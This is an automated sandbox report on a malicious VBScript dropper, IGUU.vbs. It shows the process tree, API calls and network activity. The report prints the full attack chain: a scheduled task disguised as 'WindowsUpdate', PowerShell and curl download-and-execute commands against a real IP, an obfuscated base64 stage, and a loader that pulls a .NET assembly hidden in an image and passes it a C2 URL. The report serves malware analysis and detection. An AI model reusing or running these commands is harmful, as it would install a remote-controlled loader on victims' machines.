popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

IGUU.vbs

Generic Malware Antivirus Hide_URL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 10, 2023, 9:37 a.m. Aug. 10, 2023, 9:39 a.m.
Size 683.0B
Type ASCII text, with very long lines, with CRLF line terminators
MD5 31e9ee45e3a0e6c4c020ac248a843a7d
SHA256 59d7b26194718624225aff035399576b549f9b2ece3c52ef5974d1073a23ba37
CRC32 7B1E6F65
ssdeep 12:KChK7QvuYYYndsWInMI1kbQpcABjrfIMhA9ncf7/FEbQ2KsWIneI1kbQpcxjry1E:F87Q204gb+3XhAlcZEbQ2VSbtxhAlcZj
Yara
  • Antivirus - Contains references to security software

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\IGUU.vbs

    1488

    • schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow

      2068

    • powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs; Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow }"

      2116

      • curl.exe "C:\util\curl\curl.exe" http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs

        2264

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\Temp\hkcmd.vbs

        2320

        • wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\hkcmd.vbs"

          2424

          • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#cwBn#@$#G4#@$#aQB0#@$#HQ#@$#ZQBz#@$#C8#@$#U#@$#BT#@$#FM#@$#Lw#@$#5#@$#Dg#@$#Lg#@$#5#@$#DM#@$#Mg#@$#u#@$#DQ#@$#OQ#@$#u#@$#DM#@$#Mg#@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

            2512

            • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.sgnittes/PSS/98.932.49.32//:ptth');$method.Invoke($null, $arguments)"

              2648

Name Response Post-Analysis Lookup
apps.identrust.com
A 121.254.136.27
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
23.67.53.17
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
172.67.215.45
IP Address Status Action
104.21.45.138 Active Moloch
121.254.136.27 Active Moloch
164.124.101.2 Active Moloch
23.94.239.89 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Value for '/tr' option cannot be more than 261 character(s).
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:184
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageByte
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: s = $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: ]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BA
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: SE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: .IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conver
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: t]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assem
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: bly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: = $type.GetMethod('VAI');$arguments = ,('txt.sgnittes/PSS/98.932.49.32//:ptth'
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: );$method.Invoke($null, $arguments)
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000010f
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: At line:1 char:247
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageByte
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: s = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: 8.GetString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BA
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: SE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: .IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conver
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: t]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assem
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: bly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: = $type.GetMethod('VAI');$arguments = ,('txt.sgnittes/PSS/98.932.49.32//:ptth'
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: );$method.Invoke($null, $arguments)
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001ef
1 1 0

WriteConsoleW

 buffer: At line:1 char:353
console_handle: 0x000001fb
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_
console_handle: 0x00000207
1 1 0

WriteConsoleW

 buffer: private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageByte
console_handle: 0x00000213
1 1 0

WriteConsoleW

 buffer: s = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF
console_handle: 0x0000021f
1 1 0

WriteConsoleW

 buffer: 8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_E
console_handle: 0x0000022b
1 1 0

WriteConsoleW

 buffer: ND>>';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText
console_handle: 0x00000237
1 1 0

WriteConsoleW

 buffer: .IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex
console_handle: 0x00000243
1 1 0

WriteConsoleW

 buffer: += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command =
console_handle: 0x0000024f
1 1 0

WriteConsoleW

 buffer: $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Conver
console_handle: 0x0000025b
1 1 0

WriteConsoleW

 buffer: t]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assem
console_handle: 0x00000267
1 1 0

WriteConsoleW

 buffer: bly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method
console_handle: 0x00000273
1 1 0

WriteConsoleW

 buffer: = $type.GetMethod('VAI');$arguments = ,('txt.sgnittes/PSS/98.932.49.32//:ptth'
console_handle: 0x0000027f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be6d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005be818
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bea98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bed98
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005beb58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005bebd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c2508
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c2c08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c2c08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c2c08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c22c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c22c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c22c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c22c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c22c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005c22c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://23.94.239.89/520/b/update.vbs
request GET http://23.94.239.89/520/b/update.vbs
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2116
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
